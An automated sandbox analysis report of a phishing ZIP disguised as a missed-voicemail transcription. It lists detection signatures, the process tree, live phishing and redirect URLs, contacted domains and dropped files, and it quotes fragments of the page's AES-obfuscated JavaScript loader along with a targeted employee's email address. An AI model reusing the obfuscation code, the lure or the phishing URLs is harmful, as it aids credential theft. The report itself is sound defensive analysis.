Windows Analysis Report
You_missed_a_VM _Transcription_Available_Play_Now.zip

Overview

General Information

Sample name: You_missed_a_VM _Transcription_Available_Play_Now.zip
Analysis ID: 1489929
MD5: 221f7e9438c2f8c1ba887734276da8b8
SHA1: 3068c66307ea34c3368385b346c18b1d3853f649
SHA256: e8afbd2ef4b53ba9de32e9ba6193ebd4adbb160145d5c58c6ff5a0d7bbc19b67

Detection

HTMLPhisher
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected HtmlPhish70
Yara detected Phisher
HTML page contains hidden URLs
HTML page contains hidden email address
HTML page contains suspicious javascript code
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • rundll32.exe (PID: 3984 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • OUTLOOK.EXE (PID: 6936 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\AppData\Local\Temp\Temp1_You_missed_a_VM _Transcription_Available_Play_Now.zip\dedc83fb-bb86-46ba-eb0a-08dcb6f9d89e\0487740a-25b6-b501-5a7a-7d2325a24229.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 1092 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "43C5E950-F79A-4689-85C2-4010AE93AD34" "DFDF5C69-B937-45E0-AA89-6BE25B94BA15" "6936" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 6024 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\TZUVH3C8\Voicemail Unanswered Transcriptions174911222280000000082_Vossloh.htm MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 2464 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=1640,i,7162689418209009377,951733317594602738,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
Source                  | Rule                     | Description                 | Author       | Strings
dropped/chromecache_98  | JoeSecurity_Phisher_2    | Yara detected Phisher       | Joe Security |
dropped/chromecache_80  | JoeSecurity_HtmlPhish_70 | Yara detected HtmlPhish_70  | Joe Security |
4.3.pages.csv           | JoeSecurity_HtmlPhish_70 | Yara detected HtmlPhish_70  | Joe Security |
4.4.pages.csv           | JoeSecurity_HtmlPhish_70 | Yara detected HtmlPhish_70  | Joe Security |
Sigma detected: Office Autorun Keys Modification
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6936, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
No Suricata rule has matched

Phishing

Source: Yara match | File source: 4.3.pages.csv, type: HTML
Source: Yara match | File source: 4.4.pages.csv, type: HTML
Source: Yara match | File source: dropped/chromecache_80, type: DROPPED
Source: Yara match | File source: dropped/chromecache_98, type: DROPPED
Source: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20= | HTTP Parser: https://sparkqueste.com.ru///3825.php
Source: https://kisswire.com/fthjx.php | HTTP Parser: karen.burch@vossloh.com
Source: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20= | HTTP Parser: window.location.href = atob(
          Source: https://kisswire.com/fthjx.php?4-797967704b536932307466507a7370495430744a5338346f5338724b7938724f4166494b79347641794e5459784e5459314d6a59794e685572794178506256594c79573154423841-calypsoHTTP Parser: var range= document.createelement("script");range.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(range);range.onload=function(){var {a,b,c,d} = json.parse(atob("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...
          Source: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20=HTTP Parser: async function packed(page) { <!-- <span>a cars beauty lies in the stories it tells.</span> --> var {a,b,c,d} = json.parse(page); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } async function cabinet() {jadedness.hidden = 0;yellow.hidden = 1; document.write(await packed(await (await fetch(await packed(atob(`eyjhijoiajiznek2dujpatzbk2n3t2rukzlmrgxgmhdsb2x6otrbownotni1tdzsaz0ilcjjijoiyjywyjg1mdq3zwm0zmvjnmeyotqzztazytcxnjvknjkilcjiijoiowy0ngu0ywi2ngy1zjg4mde5zdk1zjy5ytyyy2iwymq0zdbmzdflzdu2zji1ndu1m2rjymrmmtywn2njzjjlmgy0zgzimdbizmm3zdy2n2mzotewnjewmzhmnwzkmtq3nwq0zmnhzduznguzowrlyjrkyzy3mdg2ngniotm5yzixnzixmzdkmzuymdjjogq3nmu4mtjizwu3nzkxmjrly2qwytqwzdq1ztixyjzmmjc1zwq3yjdkmtewnwu1mzm2zmuwythmy2q2zwvmmzvmotnlyty4ztbjy2jindzhyzewztflmjmxnzgzmjg1odazyzdinmrjyzayodmzzjzhnmexogvlztg3ndrkotlm...
Source: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20= | HTTP Parser: Number of links: 0
Source: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20= | HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20= | HTTP Parser: Total embedded image size: 45708
Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/TZUVH3C8/Voicemail%20Unanswered%20Transcriptions174911222280000000082_Vossloh.htm | HTTP Parser: Base64 decoded: karen.burch@vossloh.com
Source: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20= | HTTP Parser: Title: abolitionist does not match URL
Source: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20= | HTTP Parser: <input type="password" .../> found
Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/TZUVH3C8/Voicemail%20Unanswered%20Transcriptions174911222280000000082_Vossloh.htm | HTTP Parser: No favicon
Source: https://kisswire.com/fthjx.php | HTTP Parser: No favicon
Source: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20= | HTTP Parser: No favicon
Source: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20= | HTTP Parser: No <meta name="author".. found
Source: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20= | HTTP Parser: No <meta name="copyright".. found
Source: unknown | HTTPS traffic detected: 20.190.159.0:443 -> 192.168.2.16:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49765 version: TLS 1.2
Source: chrome.exe | Memory has grown: Private usage: 1MB later: 29MB
Source: global traffic | DNS traffic detected: DNS query: kisswire.com
Source: global traffic | DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic | DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: global traffic | DNS traffic detected: DNS query: kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev
Source: global traffic | DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic | DNS traffic detected: DNS query: sparkqueste.com.ru
Source: global traffic | DNS traffic detected: DNS query: code.jquery.com
Source: classification engine | Classification label: mal72.phis.winZIP@23/25@34/100
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | File created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | File created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20240808T0604370209-6936.etl
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\AppData\Local\Temp\Temp1_You_missed_a_VM _Transcription_Available_Play_Now.zip\dedc83fb-bb86-46ba-eb0a-08dcb6f9d89e\0487740a-25b6-b501-5a7a-7d2325a24229.eml"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "43C5E950-F79A-4689-85C2-4010AE93AD34" "DFDF5C69-B937-45E0-AA89-6BE25B94BA15" "6936" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\TZUVH3C8\Voicemail Unanswered Transcriptions174911222280000000082_Vossloh.htm
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=1640,i,7162689418209009377,951733317594602738,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: c2r64.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Window found: window name: SysTabControl32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Process information queried: ProcessInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Queries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: 1 Scripting; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 Process Injection; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; 1 Extra Window Memory Injection; Network Logon Script; RC Scripts
Defense Evasion: 1 Masquerading; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Rundll32; 1 DLL Side-Loading; 1 Extra Window Memory Injection
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 Process Discovery; 1 File and Directory Discovery; 13 System Information Discovery; System Network Configuration Discovery; Internet Connection Discovery; Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 2 Encrypted Channel; 1 Non-Application Layer Protocol; 2 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

          No Antivirus matches
Source | Detection | Scanner
www.google.com | 0% | Virustotal
a.nel.cloudflare.com | 0% | Virustotal
cdnjs.cloudflare.com | 0% | Virustotal
kisswire.com | 0% | Virustotal
code.jquery.com | 1% | Virustotal
challenges.cloudflare.com | 0% | Virustotal

Source | Detection | Scanner | Label
file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/TZUVH3C8/Voicemail%20Unanswered%20Transcriptions174911222280000000082_Vossloh.htm | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Reputation
a.nel.cloudflare.com | 35.190.80.1 | true | false | unknown
sparkqueste.com.ru | 188.114.96.3 | true | true | unknown
code.jquery.com | 151.101.130.137 | true | false | unknown
kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev | 172.66.44.101 | true | false | unknown
cdnjs.cloudflare.com | 104.17.25.14 | true | true | unknown
kisswire.com | 192.185.24.13 | true | false | unknown
challenges.cloudflare.com | 104.18.95.41 | true | false | unknown
www.google.com | 142.250.186.132 | true | false | unknown
Name | Malicious | Antivirus Detection | Reputation
https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20= | true |  | unknown
https://kisswire.com/fthjx.php | true |  | unknown
file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/TZUVH3C8/Voicemail%20Unanswered%20Transcriptions174911222280000000082_Vossloh.htm | false | Avira URL Cloud: safe | unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ng22g/0x4AAAAAAAgrXiMAcsuVEmT-/auto/fbE/normal/auto/ | false |  | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
52.113.194.132 | unknown | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
172.66.44.101 | kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev | United States | 13335 | CLOUDFLARENETUS | false
20.189.173.5 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
173.194.76.84 | unknown | United States | 15169 | GOOGLEUS | false
104.18.95.41 | challenges.cloudflare.com | United States | 13335 | CLOUDFLARENETUS | false
151.101.130.137 | code.jquery.com | United States | 54113 | FASTLYUS | false
172.66.47.155 | unknown | United States | 13335 | CLOUDFLARENETUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
188.114.97.3 | unknown | European Union | 13335 | CLOUDFLARENETUS | false
52.109.28.47 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
2.19.126.160 | unknown | European Union | 16625 | AKAMAI-ASUS | false
192.185.24.13 | kisswire.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false
188.114.96.3 | sparkqueste.com.ru | European Union | 13335 | CLOUDFLARENETUS | true
142.250.186.132 | www.google.com | United States | 15169 | GOOGLEUS | false
142.250.186.110 | unknown | United States | 15169 | GOOGLEUS | false
35.190.80.1 | a.nel.cloudflare.com | United States | 15169 | GOOGLEUS | false
172.217.18.99 | unknown | United States | 15169 | GOOGLEUS | false
52.109.76.240 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
104.17.25.14 | cdnjs.cloudflare.com | United States | 13335 | CLOUDFLARENETUS | true
52.109.76.144 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
13.74.129.92 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
                    IP
                    192.168.2.16
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1489929
                    Start date and time:2024-08-08 12:03:53 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:19
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • EGA enabled
                    Analysis Mode:stream
                    Analysis stop reason:Timeout
                    Sample name:You_missed_a_VM _Transcription_Available_Play_Now.zip
                    Detection:MAL
                    Classification:mal72.phis.winZIP@23/25@34/100
                    Cookbook Comments:
                    • Found application associated with file extension: .zip
                    • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 52.109.76.240, 52.113.194.132, 52.109.28.47, 2.19.126.160, 2.19.126.151
                    • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Not all processes were analyzed, report is missing behavior information
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtSetValueKey calls found.
Input | Output
URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/TZUVH3C8/Voicemail%20Unanswered%20Transcriptions174911222280000000082_Vossloh.htm Model: jbxai | {"error":"[Errno 111] Connection refused"}
URL: https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/#Ha2FyZW4uYnVyY2hAdm9zc2xvaC5jb20= Model: jbxai | {"error":"[Errno 111] Connection refused"}
                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):231348
                    Entropy (8bit):4.3859865829480515
                    Encrypted:false
                    SSDEEP:
                    MD5:78349881C816CE02FBA95ADB3F88FF22
                    SHA1:879EFEE651AF7E2FCDC8E814A3948BE32B924BBA
                    SHA-256:C882451B0C504F180EFC257B53C3725EE590A0B0B2AD25F0104A4C2700915D2D
                    SHA-512:24D43758392977717CF2260930D78AA4597E6805D03494B37F057BADC62C72A57900A77C3E4965143EBF4920C3367505F5A916AA0767F4F191A8B5FA1E6AD4A3
                    Malicious:false
                    Reputation:unknown
                    Preview:TH02...... .._bOz.......SM01X...,.....TOz...........IPM.Activity...........h...............h............H..h..^.....a.F....h............H..h\cal ...pDat...h....0.....^....h..............h........_`Gk...h....@...I.lw...h....H...8.Lk...0....T...............d.........2h...............kf.i.....-.E...!h.............. hC.......(.^...#h....8.........$h........8....."h0`......@b....'h..............1h...<.........0h....4....Lk../h....h.....LkH..hp...p.....^...-h .......T.^...+hY........^................. ..............F7..............FIPM.Activity....Form....Standard....Journal Entry...IPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000.GwwMicrosoft...This form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..
                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                    File Type:ASCII text, with very long lines (65536), with no line terminators
                    Category:dropped
                    Size (bytes):322260
                    Entropy (8bit):4.000299760592446
                    Encrypted:false
                    SSDEEP:
                    MD5:CC90D669144261B198DEAD45AA266572
                    SHA1:EF164048A8BC8BD3A015CF63E78BDAC720071305
                    SHA-256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
                    SHA-512:16F8A8A6DCBAEAEFB88C7CFF910BCCC71B76A723CF808B810F500E28E543112C2FAE2491D4D209569BD810490EDFF564A2B084709B02963BCAF6FDF1AEEC59AC
                    Malicious:false
                    Reputation:unknown
Preview:51253fe60063c31af0d295afb42228b0:v2:2:1:1590:2:8479:
                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):10
                    Entropy (8bit):2.1609640474436813
                    Encrypted:false
                    SSDEEP:
                    MD5:65CE9202546CD7630D3A5E8DDDCFB2F2
                    SHA1:091393E711816D6F7CA34BF8DED1BA67BF7C3C7A
                    SHA-256:0804850B421D5C6C9622F2BED9A90ED47747C6953674B7674868F1C78A022C95
                    SHA-512:E81A4EC1B5F710F2564F5A75177F2FB2A3C2565CF3F92F531D99A7E287CA25906BF7ED17BABAFACBF0A41F6BFEA4EF608CAC456910189F0CA316DA0C324BDC2A
                    Malicious:false
                    Reputation:unknown
                    Preview:1723111481
                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):175403
                    Entropy (8bit):5.288134969885406
                    Encrypted:false
                    SSDEEP:
                    MD5:72C665D211EC5E98386ABE52AD711A18
                    SHA1:7A24D56E7F2B3A9073751787556360D25B2E1297
                    SHA-256:58CCD624EF7A3E5E7BD082761EA7BBE4F27C752FA2010550E07CC3437FDA18BA
                    SHA-512:4A26F14A07C43A3D367F3B1DB77784B515C5BCCE73ED7A2BCDF31666A7FBE76406B76316CE14D6DB4884FBC0DC037E365ED670DDD9878E3DF9E1203A6E6533FC
                    Malicious:false
                    Reputation:unknown
                    Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-08-08T10:04:39">.. Build: 16.0.17902.40125-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[
                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                    File Type:SQLite Rollback Journal
                    Category:dropped
                    Size (bytes):4616
                    Entropy (8bit):0.1384465837476566
                    Encrypted:false
                    SSDEEP:
                    MD5:620040387917C96B8173E1F5E1E1B7DD
                    SHA1:FB33B6977982F6D41055C52F541A14C5EC984E87
                    SHA-256:1CF6A670D13BB96457C348EA3BD77379DB3AE83E258B40F92D2010C76DA6C505
                    SHA-512:88BD3D203B68524B2D24153AF9D95BE978ABBFACF3BBFA8FACA68097DF194F6055907FFF39583142A645AC169D535CFA0FCC8A0C869821106B3DA79D69997242
                    Malicious:false
                    Reputation:unknown
                    Preview:.... .c.......v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................K.................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (450), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1548
                    Entropy (8bit):5.354959818413628
                    Encrypted:false
                    SSDEEP:
                    MD5:AFE80A4CF030A836A70E9B2C21292CCD
                    SHA1:D36DA811EBD1F39A213957327A9ACA4E20DFE246
